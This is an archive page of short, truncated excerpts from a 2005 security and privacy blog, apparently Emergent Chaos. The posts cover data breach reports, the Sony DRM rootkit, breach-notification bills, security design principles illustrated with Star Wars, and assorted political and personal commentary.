The Seattle Post Intelligencer reports that “ChoicePoint warns consumers about fraud:” ChoicePoint Inc., the company that disclosed earlier this year that thieves had accessed its massive database of consumer information, said Tuesday in a regulatory filing it has sent out another 17,000 notices to people telling them they may be victims of fraud. The story […]

 

University of Tennessee, 1,900 SSNs, Bad Policies

The University of Tennessee notified about 1,900 students and employees yesterday that their names and Social Security numbers inadvertently were posted on the Internet. … A University of Tennessee student made the discovery about two weeks ago when she searched the Internet for her name and found it listed with her Social Security number on […]

 

Are You Selling This Computer to Me or the RIAA?

(I wrote this a few weeks back, and forgot to post it. It’s even more fun with the bruhahaha about Sony/BMG screwing with your computer if you buy their “music.”) In conversation with Lucky Green, he commented that “You won’t be able to buy a laptop w/o a TPM in a few years.” This doesn’t […]

 

Macromedia Flash Critical Update

There’s apparently a critical flaw in Macromedia Flash 7. (You know, the software that plays annoying ads in your browser?) This affects at least PCs and Macs. Macromedia’s advisory is here. eeye has an advisory which makes it sound like a PC-only issue. Sec-Consult has published POC code. It’s unclear to me why, 130 days […]

 

Freedom to Develop

Two related posts from last week that I’d like to tie together. Jeff Veen writes about the lack of either Mac software or standards compliance in Polar Heart Rate Monitors in “Polar Heart Rate Monitors: Gimme my data,” and Bob Frankston writes about how the telcos use the regulators to stifle competition and innovation in […]

 

Choicepoint Roundup

Well, I’ve tried going cold turkey, but wasn’t getting positive reinforcement, so I stopped. Let’s start from the positive, shall we? Chris Hoofnagle of EPIC is quoted in a positive light in “ChoicePoint says it’s securing public’s personal data better” in the Atlanta Journal Constitution. Now that that’s out of the way. Science Daily tells […]

 

Iraq-al Qaeda Link Questioned

The New York Times has a story, “Report Warned Bush Team About Intelligence Doubts:” “It is possible he does not know any further details; it is more likely this individual is intentionally misleading the debriefers,” the February 2002 report said. “Ibn al-Shaykh has been undergoing debriefs for several weeks and may be describing scenarios to […]

 

The Tories Just Don't Understand Art

Audiences at the Government-funded Chapter arts centre in Canton, Cardiff, see Miss Takahashi arrive on stage in high heels and a smart black business suit. For the next three hours, they watch her drink bottle after bottle, periodically lurching towards her beam and seeing how much of it she can negotiate without falling off. … […]

 

Froomkin and Vladeck on Roberts

Ann Bartow describes it as “completely awesome pedantic weeniedom, and I mean that in the best possble way.” I would have just tossed this in my del.icio.us feed, but wanted to boost Michael Froomkin’s page rank for pedantic weeniedom. I hope he doesn’t mind. (Via Volokh)

 

Strategy In Iraq: Stay the Course vs Partial Disruption

Global Guerrillas has a fascinating post, “PARTIAL vs. COMPLETE SYSTEM DISRUPTION.” The thesis is that Iraqi guerrillas and terrorists have the ability to complete the collapse of Iraq into anarchy, but have chosen not to, for reasons that he lays out. As van Creveld predicted in “The Transformation of War,” we lack a good way […]

 

Data Destroying Anonymity

New Scientist reports “Anonymous sperm donor traced on internet:” LATE last year, a 15-year-old boy rubbed a swab along the inside of his cheek, popped it into a vial and sent it off to an online genealogy DNA-testing service. But unlike most people who contact the service, he was not interested in sketching the far […]

 

Miss McDonald's Halloween

Miss McDonald has an art project at Livejournal: Or perhaps Miss McDonald is an art project. Hard to say with any certainty. But why would you want to?

 

15% of Oregonians at Risk from DMV

Police have a warning for anyone who did business with the Oregon Department of Motor Vehicles in 1999 or 2000. They say as many as a half-million stolen DMV records were found on a laptop during a methamphetamine bust Wednesday night at a southeast Portland apartment complex. They allegedly discovered evidence of meth distribution and […]

 

Business Process Hacking

Business process hacking is the act of using weaknesses in the way an application is exposed to garner information or break in. Recent examples include the ChoicePoint and Lexis-Nexis attacks. Here is a new one. A couple of young traders at an Estonion bank got a Businesswire account and proceeded to dig around until they […]

 
 

We want it all, and we want it now

Bob Sullivan provided excellent “mainstream media” ChoicePoint coverage, and is doing some good blogging about breach legislation. From the blog post cited above, it’s clear that Sullivan considers the Act in question to be nigh-on to a total cave-in to industry. That things would have taken this turn is not surprising, but is nonetheless somewhat […]

 

Oh what a tangled web we weave…

Sony’s DRM rootkit has been harnessed by folks selling a program which hides game cheats from detective measures shipped with WoW and affectionately known as The Warden. Somehow, I am reminded of a Simpson’s quote [.mp3]

 

Friday Star Wars: Principle of Fail-safe Defaults

In this week’s Friday Star Wars Security Blogging, I’m continuing with the design principles from Saltzer and Scheoder’s classic paper. (More on that in this post.) This week, we look at the principle of fail-safe defaults: Fail-safe defaults: Base access decisions on permission rather than exclusion. This principle, suggested by E. Glaser in 1965 means […]

 

10m (or more) Stolen Passports

Arab News picks up an Agency France Presse story, “Terrorist Access to Stolen Passports Alarms Interpol:” (Via Flogging the Simian’s Nov 4 PDB.) NEW YORK, 4 November 2005 — With 10 to 15 million stolen passports in use around the world at the present time, the global struggle against terrorism is seriously hampered, Interpol Secretary-General […]

 

Hashes: The High Cost of Deployment

Thanks for great intro Adam!. Steven Bellovin and Eric Rescorla recently released a paper, “Deploying a New Hash Algorithm.” This is a great analysis of both the operational and protocol issues with changing which hash algorithms get used by various security protocols. For instance, S/MIME has no real mechanism for negotiating which hashes (and this […]

 

Introducing Arthur

I’d like to introduce Arthur, our newest guest. I was going to say Arthur is not his real name, but that would be a lie. It is his real name for purposes of this blog. It might, however, not be what his wife calls him. (“Sweetie.”) Arthur is, however, the chief information security officer for […]

 

Joseph Ansanelli, Brad Smith on Privacy Law

The [Stearns] bill would also require companies to notify not just consumers of a breach, but also the F.T.C., which would then be permitted to audit the company’s security program. “But it needs better enforcement language,” said Joseph Ansanelli, the chief executive and co-founder of Vontu, an information security company in California, who has frequently […]

 

The CIA's "Prisons"

Yesterday’s Washington Post had a long, sickening article on “CIA Holds Terror Suspects in Secret Prisons:” The hidden global internment network is a central element in the CIA’s unconventional war on terrorism. It depends on the cooperation of foreign intelligence services, and on keeping even basic information about the system secret from the public, foreign […]

 

The Cost of Following The Money

[Update: There’s a fairly long clarification in the middle of the post, which expands on a sentence that was too brief to be understandable.] One of the fond dreams of the counter-terror community is to be able to take Deep Throat’s advice, and follow the money. In “New Anti-Money Laundering Regulations and Compliance Solutions Announced,” […]

 

Episode III Released on DVD

Q. Do friends and family ever ask you [Frank Oz] to do Yoda on their phone answering machines? A. Yep. And I always say no. He’s not a party trick. He’s not a trained monkey. And I’m not a man like Mel Blanc, who’s a brilliant man of voices. I’m a man of characters; I […]

 

Relentless Navel Gazing, Part 2

Upgraded the blog software, added a fair number of little tidbits, including lots more archive indexes, better per-post options, and will be tweaking lots of little stuff over the next few days. Also, added automated “posted by” bits, and am going through older posts and cleaning out those bits. Which means that RSS will get […]

 

Speaking Of Worms

Following up on Chris’s worm post, Red Database Security has an advisory on an Oracle worm. On 31-october 2005 an anonymous poster (oracleworm@hushmail.com) released a proof-of-concept PL/SQL source code of an Oracle worm on the full disclosure mailing list. The worm is using the utl_tcp package to find other Oracle databases in the same subnet […]

 

Properties of National ID Systems

In “learning from others,” Jerry Fishenden writes at length about National ID systems and their impact on society. His post includes a list of properties an ID system should have, (originally from Niels Bjergstrom). His theme that these systems don’t only have ‘features,’ but properties is an important one. I’d like to suggest two additions: […]

 
 

Sony, Respecting Their Customer

Over at Sysinternals, Mark posts “Sony, Rootkits and Digital Rights Management Gone Too Far.” [Update: If that doesn’t work, try Sysinternals Blog; when I checked, it was the first post.] If you’re at all technical, read it closely. If you’re not, you should at least skim it. The story is that Mark (who knows more […]

 

American Express and Privacy

There’s a fascinating story at imedia connection, “Why Consumers Trust American Express:” How has American Express retained its position? Kimberly Forde, an American Express spokesperson, told me that “American Express is very pleased to be recognized by consumers for its ongoing and strong commitment to privacy.” Moreover, she felt that American Express had done a […]

 

Imperial Ambition, Poor Execution

In “The endgame on Iraq began a long time ago,” Thomas Barnett writes some shocking things: This is Musab al-Zarqawi’s worst nightmare: the Americans safe behind their compound walls and everyday he’s doing battle against Iraqis, or-more to the point-against Shiites increasingly backed by Iran, no friend to the global Salafi jihadist movement, being as […]

 

First Hand Report about New TSA Indignities

In “GE Puffer Stinks of Dr. Strangelove,” Kim Cameron writes about his experiences with the new explosive detection machines: People, I really hated the GE product. It is tiny, and closes around you. I felt seriously claustrophobic. Then it shot bursts of air at me so hard it actually hurt. I had been told there […]

 

Fall Back

Its that time of year again, when Congress decrees that you shift your clock back an hour to save miniscule amounts of energy. The fine folks of Arizona and Indiana have noticed that Congress doesn’t really have the power to regulate time, and don’t like playing along. But if you think about it, time is […]

 
 

Porsches make you healthy

Well, I don’t know that for sure. But I am pretty sure that Porsche owners overall are healthier than those who don’t own Porsches. Maybe you have to control for age. Similarly, it seems that being a customer of certain companies apparently somehow causes less nastiness to befall ones computing infrastructure. Jaquith handily, yet unwittingly, […]

 

Quick pointer to virtual worminess

If Nick Weaver and Jose Nazario are writing about it, it’s probably way over my head, or interesting, or both. I am happy to say this is in the second category.

 

Ahmadinejad and Wiping Israel Off The Map

Posted by Adam It seems that most everything that one could say about the President of Iran calling for Israel to be wiped off the map has been said. Good articles include Daniel Drezner’s “How crazy is Mahmoud Ahmadi-Nejad?” (about the strategy behind the statement), Hossein (Hoder) Derakhshan’s “The fundamentalist minority” (about how Iranians feel […]

 

The Importance of Attitude

Tom Peters has a blog, and in “The Days of Our Lives,” writes about the importance of being present for your customers, not for yourself. I really like his blog. It has a good mix of hubris and humility: This may be day 45 and mile 76,000 for me, but for the Client it is […]

 

Star Wars: Economy Of Mechanism

Before I start on the Star Wars part of today’s Friday Star Wars Security blogging, I need to explain who Saltzer and Schroeder are, and why I keep referring to them. Back when I was a baby in diapers, Jerome Saltzer and Michael Schoeder wrote a paper “The Protection of Information in Computer Systems.” That […]

 

Check images increase forgery and ID theft risks?

The October 26 on-line edition of American Banker (gotta pay to see it, so no link from me) discusses new technologies as possible enablers of check forging, in an article by Daniel Wolfe, “The Tech Scene: Check Images A New Frontier For Forgery?” The overall point is that since banks store check images and provide […]

 

White Sox futures market

For the last couple of weeks, peddlers have set up shop just outside Chicago’s Union Station to sell White Sox paraphernalia. Once the Sox were in the Series, I noticed an interesting phenomenon. Hats were selling for $10.00 after game two of the series. After game three, they were down to $5.00. After game 4 […]

 

Dog bites man really is boring

Red Herring reports on a claim by Cybertrust that recovering from Zotob cost the average infected company $97,000. Sounds moderately interesting, until you learn that the industry hardest hit, healthcare, had 74% of its respondents totally unaffected. For financial firms, 93% were totally unaffected. Overall, nearly 90% of firms had no impact. Nada. Alternative headlines […]

 

Lowering Ourselves

It occurs to me that when a senior US governement lawyer says: foreign citizens passing through American airports have almost no rights. At most, Mary Mason told a hearing in Brooklyn, N.Y., passengers would have the right not to be subjected to “gross physical abuse.” that they are in direct contradiction to the US Constitution […]

 

Flogging The Simian Is Back

In “A Life, Observed,” I mentioned that I’d been enjoying “Flogging The Simian,” and that she’d left due to privacy issues. Well, she’s back, and so are her “PDBs,” her summaries of what’s interesting: ‘” read approximately 50 newspapers every morning and report what I find there, with an emphasis on foreign or international events.” […]

 

Trick-Or-Treaters To Be Subject To Random Bag Searches

America’s Finest News source reports, “Trick-Or-Treaters To Be Subject To Random Bag Searches:” “Individuals concealing their identities through clever disguise, and under cover of night, may attempt to use the unspecified threat of ‘tricks’ to extort ‘treats’ from unsuspecting victims,” Chertoff said. “Such scare tactics may have been tolerated in the past, but they will […]

 

Code/Data Separation

As I mentioned in my “Blue Hat Report,” I want to expand on one of my answers I gave to a question there. My answer involved better separation of code and data. I’ve since found, in talking to a variety of folks, that the concept is not so obvious as it seems to me. The […]

 

The President Endorses This Blog

You might have thought that the White House had enough on its plate late last month, what with its search for a new Supreme Court nominee, the continuing war in Iraq and the C.I.A. leak investigation. But it found time to add another item to its agenda – stopping The Onion, the satirical newspaper, from […]

 

Delicious Offload

I’ve set up a Delicious feed for stuff that I want to point to, but don’t have either anything to add, or time to add it. I feel sort of bad doing this; I’d like to discuss John Gilmore on the New York Times, but all I have to say is bravo!

 

Counting In Computer Security

Last week in “Notes from the Security Road,” Mike Nash wrote: My favorite moment on the trip — which actually resulted in my circumnavigating the entire globe in just a week — was when we illustrated the difference in the number of vulnerabilities in Windows Server 2003 compared to its competitive product, Red Hat Enterprise […]

 

Rosa Parks

Rosa Parks passed away this evening. She was 92.

 

Business lobbies engage in rent-seeking. Masses not moved. Film at 11.

Various data protection bills to be consolidated? [P]ressure to act isn’t coming from the public clamoring for protection of their private information, it is coming from the business community that fears 50 different state laws. In many ways this improves the chances for a new federal law, because while the onslaught of data breach stories […]

 

How Not To Train Users

To provide the fastest access to our home page for all of our millions of customers and other visitors, we have made signing in to Online Banking secure without making the entire page secure. Again, please be assured that your ID and passcode are secure and that only Bank of America has access to them. […]

 

Flock's Progress

Posted by Adam Lots and lots of people are commenting on the first public release of flock. After I met Bart Decrem, he was nice enough to let me into the alpha, and so I’d like to offer a slightly different perspective, about what’s changed, and the rate of change. I think that examining what’s […]

 

Sessions Bill/Breach Monday

In ‘honor’ of the Sessions bill (see “The hand is quicker than the eye” and “Adding Silent Insult to Injury (Senator Sessions’ ‘privacy’ act)“), we offer up stories about three breaches. Under Sessions’ bad law, the state of Georgia would not be coming clean with its residents, nor would the California school system. I think […]

 

5.2% of Georgia residents to get Notice of Stolen Personal Data

State officials on Friday began notifying 465,000 Georgians that they might be at risk of identity theft because of a government security breach detected in April. Joyce Goldberg, spokeswoman for the Georgia Technology Authority, emphasized that officials had no evidence that any personal data had been used for fraudulent purposes. But she said officials are […]

 

California Schools, "tens of thousands" of Student Records, Default Passwords

The personal information of tens of thousands of California children — including their names, state achievement test scores, identification numbers and status in gifted or special-needs programs — is open to public view through a security loophole in dozens of school districts statewide that use a popular education software system. … The problem occurs when […]

 

Montclair State University, 9,100 SSNs, Exposed Files

Due to what Montclair State University officials are calling an “inadvertent error,” the social security numbers of 9,100 Montclair State University students were made available online for nearly five months, putting each student at risk for identity theft and credit fraud. Etc, etc, files found by a student ego-surfing on Google. Read “Negligence At MSU […]

 

Archimedes' Death Ray, Take 2

Earlier this month, I posted “Archimedes’ Death Ray,” about the MIT team trying to replicate Archimedes’ legendary defense of Syracuse, setting fire to ships with polished mirrors. Now Mythbusters has brought MIT Professor David Wallace to San Francisco to: …attempt to set fire to an 80-year-old fishing boat with a contraption made of 300 square […]

 

People Hate Being Laughed At

Omid Sheikhan has been sentenced by the Iranian court to one year in prison and 124 lashes. Omid was first arrested last year, confined for two months, including one in solitary confinement, and tortured, due to his blog which featured satire on the Iranian situation. When he was brought to court on October 8 he […]

 

Adding Silent Insult to Injury (Senator Sessions' "privacy" act)

I just skimmed the Sessions’ bill which Chris linked to. It has a great provision for allowing the fox to not only guard the henhouse, but also to control the alarm system: 3(b)(1)(A) IN GENERAL- If an agency or person that owns or licenses computerized data containing sensitive personal information, determines, after discovery and a […]

 

The hand is quicker than the eye

Arlen Specter and Pat Leahy have proposed the “Personal Data Privacy and Security Act of 2005“. This is a comprehensive proposal, and is opposed big-time by various industry lobbies. As reported in the October 21, 2005 American Banker, this bill has hit a snag, and is languishing in Committee. Meanwhile, another bill, courtesy of Jeff […]

 

Critical Map of Alaska Disappears

‘There is a Party slogan dealing with the control of the past,’ [O’Brien] said. ‘Repeat it, if you please.’ ‘”Who controls the past controls the future: who controls the present controls the past,”‘ repeated Winston obediently. ‘”Who controls the present controls the past,”‘ said O’Brien, nodding his head with slow approval. ‘Is it your opinion, […]

 

Snotty Worm Coming?

Posted by Adam Richard Bejtlich predicts that the Snort network monitoring tool will be hit with a worm shortly in “The Coming Snort Worm.” He has some good qualitative analysis, and Tom Ptacek disagrees with him in “Opposition Research.” I find it fascinating that we know so little that two smart guys like Tom and […]

 

Don't Have a Cow!

Or, perhaps, in this instance, having a cow would be a perfectly fine response, as it is revealed that the average European cow gets a subsidy of $2.62 a day. About 3,000,000,000 people live on less than that. Doubtless, if cows could call their representatives and vote, the subsidy would be higher. (Research by Oxfam, […]

 

Horton Hears a Heart

Brilliant retelling of the Tell-tale Heart, by Poe, in the style of Dr. Suess. True, I’ve been shaken – and true, I’ve been bad. But how can you say that this elephant’s mad? This Loopidy sickness has sharpened my brain! My ears are quite large, and I hear things quite plain. So before you pass […]

 

Bubblicious

As we now know courtesy of the Philippines’ National Capital Regional Police Office, a typical terrorist is “a man aged 17 to 35, wearing a ball cap, carrying a backpack, clutching a cellular phone and acting uneasily” [manilatimes.net]. This critical piece of intelligence, I am sorry to report, seems to have taken a step closer […]

 

Map of London

OpenStreetMap is a project aimed squarely at providing free geographic data such as street maps to anyone who wants them. This is because most maps you might think of as free actually have legal or technical restrictions on their use, holding back people from all walks of life who would like to use a map […]

 

Pop!Tech ('Pointer' post by Adam)

I don’t know how Ethan Zuckerman is finding time to enjoy the conference, but his series of posts from Pop!Tech make me jealous that I’m missing it.

 

"The Force Is Strong In My Family"

In Friday Star Wars Security blogging, I was planning to start on Saltzer and Schroeder this week. But I’m going to detour a bit into genetic privacy (and Star Wars, of course). I’m inspired in part by an interview over at GeneForum with bioethicist Insoo Hyun. Hyun is studying cloning with the South Korean team […]

 

Following up "Liability for Bugs"

Chris just wrote a long article on “Liability for bugs is part of the solution.” It starts “Recently, Howard Schmidt suggested that coders be held personally liable for damage caused by bugs in code they write.” Chris talks about market failures, but I’d like to take a different direction and talk about organizational failures. Security […]

 

Liability for bugs is part of the solution

Recently, Howard Schmidt suggested that coders be held personally liable for damage caused by bugs in code they write. The boldness of this suggestion is exceeded only by its foolhardiness, but its motivation touches an important truth — alot of code stinks, and people are damaged by it. The reason good programs (which means those […]

 

The prescience of the Beeb

Via Alec Muffett’s dropsafe, I learned of a British SF television program which eerily predicted a future Britain in which a sinister governmental department that has abolished individual rights and introduced ID cards for all citizens, rationing and sophisticated electronic surveillance I would have preferred to have gotten a transdimensional police box.

 

Your Printer, Tool of the Man

The EFF has done some great work on how high resolution color printers are embedding tracers in every document they print. It’s at “DocuColor Tracking Dot Decoding Guide.” I’d call them high quality printers, but how could I? They intentionally distort every document they print on the off-chance it contains evidence of thoughtcrime. The work […]

 

How To Notify Customers After a Breach

I referenced Larry Ponemon’s “After a privacy breach, how should you break the news?” months ago. Now there’s more data, in a survey sponsored by the law firm of White and Case. They have a press release, and you can download the full survey. As Chris pointed out, knowledge is good. According to the survey, […]

 

Interesting Tidbits (Adam)

John Gruber has an interesting article on the economics of being a one-man software shop, “The Life.” He uses the case of Brent Simmons and NetNewsWire to shed light on why the life of a small software development shop is so hard. Jeff Veen of Adaptive Path has announced “MeasureMap,” a new blog-focused log analysis […]

 

Here's to you, New York…

From New York’s Information Security Breach and Notification Act: 7. (A) IN THE EVENT THAT ANY NEW YORK RESIDENTS ARE TO BE NOTIFIED AT ONE TIME, THE PERSON OR BUSINESS SHALL NOTIFY THE STATE ATTORNEY GENER- AL, THE CONSUMER PROTECTION BOARD, AND THE STATE OFFICE OF CYBER SECURI- TY AND CRITICAL INFRASTRUCTURE COORDINATION AS TO […]

 

MS Security 360 Webcast archive

The roundtable I did as part of the Security 360 (with Amy Roberts, Peter Cullen, and Gerry Gebel) is now archived at “Microsoft Executive Circle Webcast: Security360 with Mike Nash: Managing Privacy in Your Organization.” Since I’ve been posting a lot recently, I’ll repeat: after filming I participated in Microsoft’s Blue Hat, you can read […]

 

UK ID Cards a Doubly Bad Idea

Microsoft UK National Technology Officer Jerry Fishenden warns that the push for a national ID card in Great Britain could lead to identity fraud on a gigantic scale unlike anything that has been seen before. The Register reports… and Charles Clarke confirms that ID cards will be a massive waste of both time and money […]

 

Security Costs of Logging

In “Online Dirty Tricks at American Airlines ” Gary Leff reports: The Wikipedia entry on the Wright Amendment (the law which restricts destinations of flights taking off from Dallas’ Love Field, which serves — and was intended — to protect American Airlines from Southwest) was edited by someone using an American Airlines domain. Someone using […]

 

Thanks, Adam

I’ll confess to some stage fright, since this blog’s readership is probably two or three orders of magnitude larger than what my fortnightly rants over at my place probably garner. Anyway, I hope to have posts forthcoming about a few things, among them CVSS, and research into estimating the impact of security events (variously defined) […]

 

Introducing Chris Walsh

One of the things that happens as a blog takes on a personality is that readers start to send you links to things that are “more your blog than theirs.” Over the last few months, Chris has fed me something between a third and a half of the breaches listed in my breaches archive. At […]

 

Now Headlining: The Emergent Chaos Jazz Combo

As I experiment with bringing in guest bloggers, the old subtitle of the blog, ‘Musings from Adam Shostack on security, privacy, and economics’ is now inaccurate. Now I could simply declare this “Adam Shostack and friends,” but that is both boring and, with no offense to my invitees, inaccurate. (I’ve never met the fellow who […]

 

Watch our webcast!

Last week, I was in Redmond for a few days, filming a roundtable discussion with Amy Roberts of Microsoft, Gerry Gebel of the Burton Group and Peter Cullen, Microsoft’s Chief Privacy Strategist. I think we had a great discussion, the time went by really quickly. I hope that the good energy we had in the […]

 

First Shmoocon Speaker List

Shmoocon was a great get-together last year, and I look forward to being there this year, especially now that they’ve announced a first batch of speakers. Via the Shmoocon RSS feed. No, just kidding, they don’t have an RSS feed.

 

Blue Hat Report

The other thing I did at Microsoft last week was I participated in Blue Hat. Microsoft invites a selection of interesting researchers to come to Redmond and present a talk to a variety of people within the company. Blue Hat is organized by Kymberlee Price, who works with Andrew Cushman, and they did a great […]

 

Security 360 With Mike Nash (and Adam)

Last week, I was in Redmond for a few days, filming a roundtable discussion with Amy Roberts of Microsoft, Gerry Gebel of the Burton Group and Peter Cullen, Microsoft’s Chief Privacy Strategist. I think we had a great discussion, the time went by really quickly. I hope that the good energy we had in the […]

 

AOL and DHS: Where's the Proof?

Several folks have sent me a link to a Free Market News article “HOMELAND SEC. SURVEIL ALL AOL FILES,” with a suggestion I link to it. I thought it was squirrelly, but when the normally quality Chief Security Officer Magazine picks it up, I felt a need to respond. And frankly, I call bull. by […]

 

Small Travel Annoyances

I’ve slept in three different hotels in the last ten days or so, and noticed a number of things that (seemingly) could be done a lot better. The first is voice mail spam. I get no warm fuzzy from picking up a pre-recorded voice mail welcoming me to the hotel. But I do get to […]

 

Dangerous Meme

If you have to educate people to not use the tools you have given them in a certain way to remain secure you have failed. Relying on security awareness training is an admission of failure. This meme must be eradicated from the gene pool. So writes Rich Stiennon in “Dangerous meme.” He’s absolutely right. Training […]

 

Who's On Drugs?

Over at the History News Network, Keith Halderman reports on medical marijuana. It seems that the cool kids don’t want to be taking any drug that old geezers use: “Nine years after the passage of the nation’s first state medical marijuana law, California’s Prop. 215, a considerable body of data shows that no state with […]

 

Daniel Cuthbert's Chewbacca Defense

We take a break from our regularly scheduled, deeply-movie-focused, Friday Star Wars security blogging to mention the Chewbacca defense, and its interplay with a story that’s floating around. First, if you’re not familiar with it, “The ‘Chewbacca Defense‘ is a satirical term for any legal strategy that seeks to overwhelm its audience with nonsensical arguments […]

 

Blue Hat

I’m at Microsoft’s ‘Blue Hat’ event, and it’s been fascinating. Very senior folks got briefed today while I sat in the back of the room and (mostly) listened. I’ll blog some thoughts shortly, but I expect to continue to be mostly unresponsive through Sunday.

 

Codecon 2006 Call For Papers

February 10-12, 2006 San Francisco CA, USA codecon is the premier showcase of cutting edge software development. It is an excellent opportunity for programmers to demonstrate their work and keep abreast of what’s going on in their community. All presentations must include working demonstrations, ideally accompanied by source code. Presentations must be done by one […]

 

A Profusion of Taxonomies

In “In the Classification Kingdom, Only the Fittest Survive,” Carol Kaesuk Yoon writes about the profusion of naming schemes for animals: Then there’s uBio, which has sidestepped the question of codes and regulations altogether and instead aims to record every single name ever used for any organism, scientific or common, correct or incorrect, down to […]

 

Editorial Parameters?

One of the things that I’ve meant to do here is have a little chaos now and then, and see what emerges. One type of chaos that I’ve been aiming for is carefully selected guest bloggers. In talking to someone about that, he asked: What are the editorial parameters? Looking to avoid a possible “I […]

 

Businesses For Privacy

Some prominent business organizations are complaining to Congress that the Patriot Act makes it too easy for the government to get confidential business records. These groups endorsed proposed amendments that would require investigators to say how the information they seek is linked to individual suspected terrorists or spies. The changes also would allow businesses to […]

 

Airport Screening Is Not A Game?

A few weeks ago, I reported on PlayMobil’s airport screening playset in “From The Mouths of Toymakers.” Dan Solove shows his true commitment by buying one, and documenting his hours of fun in “The Airline Screening Playset: Hours of Fun!” Read it.

 

The Future of Government: Exclusive and Effective?

In Balkinization, Stephen Griffin writes about the efforts to get government and society functional again in New Orleans in “The Katrina Experiment.” In a pair of posts that are, to me, closely related, Michael Froomkin writes about “My notes from the ‘The Great Debate’ at State of Play III” and “Summing Up ‘The Great Debate’ […]

 

The Nation-State: Violent and Exclusive

I usually call my collections of links ‘small bits,’ rather than roundups, because I make no effort to round up all of what’s interesting about a subject. But today’s subject, especially the first items, I can not call small. I start with the most horrific, Rebecca MacKinnon’s “Chinese activist bludgoned to death in front of […]

 

Bank of America, some credit card numbers, laptop

In a letters sent to Buxx [prepaid debit cards] users and dated Sept. 23, [Bank of America] warned that customers may have had their bank account numbers, routing transit numbers, names and credit card numbers compromised by the theft. Visa Buxx is a prepaid credit card for teenagers that the Bank of America (BofA) stopped […]

 

Mount Sinai Hospital, 10,000 Ground Zero worker SSNs, Disgruntled Ex-Employee

Letters have gone out to about 10,000 Ground Zero rescue and cleanup workers, notifying them that a computer containing Social Security numbers and health records was stolen, leaving them vulnerable to identity theft. The letters were sent by the World Trade Center Medical Monitoring Program, which is providing free health-care services to the workers. Workers […]

 

Thomas Schelling, Nobel Laureate

Congratulations to Thomas Schelling, who was awarded the Nobel Prize in economics (with Robert Aumann). Schelling, amongst many accomplishments which Tyler Cowan discusses here, put forth the notion that there are questions with answers which are correct because those are the answers everyone would choose. (The canonical example is where do you meet in New […]

 

Security Roundup: Build Security In Edition

David Litchfield lets rip at Oracle in “Complete failure of Oracle security response.” Such questions need to be directed to more vendors than just Oracle. Andrew Jaquith writes about “Hamster Wheels of Pain” in security company presentations. The Seattle Times has an article on those new fancy, radio controlled cockpit doors, “Glitch forces fix to […]

 

FedEx and Resiliency

There’s some fascinating tidbits about how Federal Express plans for the unforseen in a New York Times story, “Have Recessions Absolutely, Positively Become Less Painful?” I wonder what (if anything) information security could take away from this sort of approach? It had been a busy day for Georgia businesses, and FedEx’s regular nightly flights from […]

 

Kill The Smurfs

The people of Belgium have been left reeling by the first adult-only episode of the Smurfs, in which the blue-skinned cartoon characters’ village is annihilated by warplanes. The short but chilling film is the work of Unicef, the United Nations Children’s Fund, and is to be broadcast on national television next week as a campaign […]

 

"A Reader Writes…"

Rob Sama IM’d me a link to some Mac launch rumors at “http://www.macpro.se/?p=3014.” He then commented: Rob: I was the one who pointed that out to Cringley, and Calzone had pointed it out to me Adam: and you got no cred? Rob: I guess. I mean, columnists like that often say “a reader told me…” […]

 

Archimedes' Death Ray?

Boingboing directs us to “Archimedes Death Ray: Idea Feasibility Testing,” in which an MIT class decides to test Archimedes’ ray: The use of mirrors to set warships on fire. Mythbusters claimed it was a myth, that the idea couldn’t be made to work. Well, the MIT class gave it a shot, and it turns out […]

 

"Where is that Shuttle Going?"

VADER: Where is that shuttle going? PIETT (into comlink): Shuttle Tydirium, what is your cargo and destination? PILOT VOICE (HAN)(filtered): Parts and technical crew for the forest moon. VADER: Do they have a code clearance? PIETT: It’s an older code, sir, but it checks out. I was about to clear them. In modern cryptography, a […]

 

The Memory Hole

As an aside in a longer article, Dan Markel writes: As a matter of blogging ethics, I think the way to handle it is to post an apology and clarification and to remove the inaccurate material, with a followup email that clarified the situation. This is dangerously wrong. The inaccurate material needs to stay, because […]

 

Concurring Opinions Has a Privacy Policy

Daniel Solove and company have launched a new blog, “Concurring Opinions.” Today, they posted their privacy policy. I think they’ll be sued shortly by Experian, for copyright infringement.

 

IT Harvest IT Security Summit

I should also mention that I had a good time at the Detroit IT Security Summit. I thought there was an interesting and broad selection of panelists, including some technical people and some senior managers. I didn’t get to talk to as many folks as I might have liked, but that’s always the case.

 

Today, I Publicly Praised Microsoft

On the “Meet the Bloggers” panel at the Detroit IT Security Summit, I publicly heaped praise on Microsoft for their investment in security, the results of which include some really cool tools in Visual Studio 2005. Also on the panel, Ed Vielmetti brought up a really good point that I hadn’t heard recently, that of […]

 

Bankers 1, Privacy 0

A federal judge on Tuesday struck down a California law that restricts banks from selling consumers’ private information to their affiliates, ruling that the state law is pre-empted by federal rules. The American Bankers Association, the Financial Services Roundtable and Consumer Bankers Association had sued California Attorney General Bill Lockyer, arguing that the federal Fair […]

 

The Big Privacy Picture

“Smart Borders: A wholesale information sharing and surveillance regime” is Krista Boa’s overview of the amorphous and opaque ‘Smart Border’ program: Smart Borders encompasses a range of individual and cooperative initiatives, including US-VISIT, biometric passports in both nations, automated passenger risk assessment, and no fly lists among many others, all of which put privacy rights […]

 

Thoughts on RSS Feeds

I spent a lot of energy to make Emergent Chaos look nice. And how do you all repay me? You read the RSS feeds. Most of my readership (85% or so) are reading via RSS. Which is nice. It says that there’s a core of folks who are interested in what I have to say, […]

 

Who Has Fingers That Short?

PaybyTouch has arrived, and that finger in their logo looks awfully short to me. Maybe subconsciously, they know the truth? See my “Fingerprint Privacy” or “A Picture is Worth A Thousand Words” for some actual analysis, rather than silly sniping. (via Silicon Beat, who has notes on their unusual financing techniques.)

 

Congrats to Brent Simmons

NewsGator Technologies has acquired NetNewsWire, along with Ranchero Software founder Brent Simmons. Simmons joins NewsGator as product architect. I discovered this via Brent’s NetNewsWire, and am blogging it with his MarsEdit. See the interview with Brent and Greg Reinacker. For consistency’s sake, I ought to be confusing Newsgator with someone else.

 

Who Obeys the Laws of War?

There’s a fascinating article on Dozame.org, a Kurdish site: “Emergence of a better Kurdish 4GW frightens Turkey:” An interesting observation is that HPG is now playing by all the rules set up by international conventions, treaties and war-laws [Jus in Bello] (which ARGK unfortunately occasionally broke). People in the military or with a military background […]

 

Privacy Enhancing Technologies Workshop call for papers

6th Workshop on Privacy Enhancing Technologies will be held at Robinson College, Cambridge, United Kingdom, June 28 – June 30, 2006. Paper submissions are due March 3, 2006. See http://petworkshop.org/2006/ for more details. [Also note that this will be colocated with the workshop on economics and information security. Thanks to Allan Friedman for reminding me.]

 

Web 2.0: What Will Emerge From Chaos?

